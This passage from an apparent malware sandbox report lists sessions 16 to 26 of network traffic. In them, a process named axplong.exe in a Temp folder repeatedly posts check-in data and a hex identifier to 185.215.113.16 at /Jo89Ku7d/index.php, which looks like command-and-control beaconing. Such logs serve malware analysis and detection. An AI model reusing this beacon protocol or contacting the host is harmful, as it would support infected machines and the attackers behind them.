                      16 | 192.168.2.5 | 53663 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:21.440730095 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:22.227663994 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:22 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:22.228288889 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:22.486747026 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:22 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      17 | 192.168.2.5 | 53664 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:22.609695911 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:23.420958996 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:23 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:23.421750069 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:23.961251974 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:23 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0
                      Jul 26, 2024 13:44:23.962969065 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:23 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      18 | 192.168.2.5 | 53665 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:24.085014105 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:24.838655949 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:24 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:24.839737892 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:25.088057995 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:24 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      19 | 192.168.2.5 | 53666 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:25.202759981 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:25.963359118 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:25 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:25.963992119 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:26.213289976 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:26 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      20 | 192.168.2.5 | 53667 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:26.327104092 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:27.104212999 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:26 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:27.104967117 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:27.351181030 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:27 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      21 | 192.168.2.5 | 53668 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:27.467679024 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:28.213622093 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:28 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:28.214281082 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:28.828835964 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:28 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0
                      Jul 26, 2024 13:44:28.831890106 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:28 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      22 | 192.168.2.5 | 53669 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:28.938251972 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:29.698223114 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:29 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:29.720066071 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:29.970496893 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:29 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      23 | 192.168.2.5 | 53670 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:30.092801094 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:30.841072083 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:30 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:30.841828108 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:31.097278118 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:30 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      24 | 192.168.2.5 | 53671 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:31.217688084 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:31.972146034 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:31 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:31.972816944 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:32.220459938 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:32 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      25 | 192.168.2.5 | 53672 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:32.373944998 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:33.154531002 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:33 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:33.155664921 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:33.448235035 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:33 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      26 | 192.168.2.5 | 53673 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:33.562948942 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:34.337992907 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:34 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:34.338814020 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:34.728729963 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:34 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0
                      Jul 26, 2024 13:44:35.075078964 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:34 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      27 | 192.168.2.5 | 53674 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
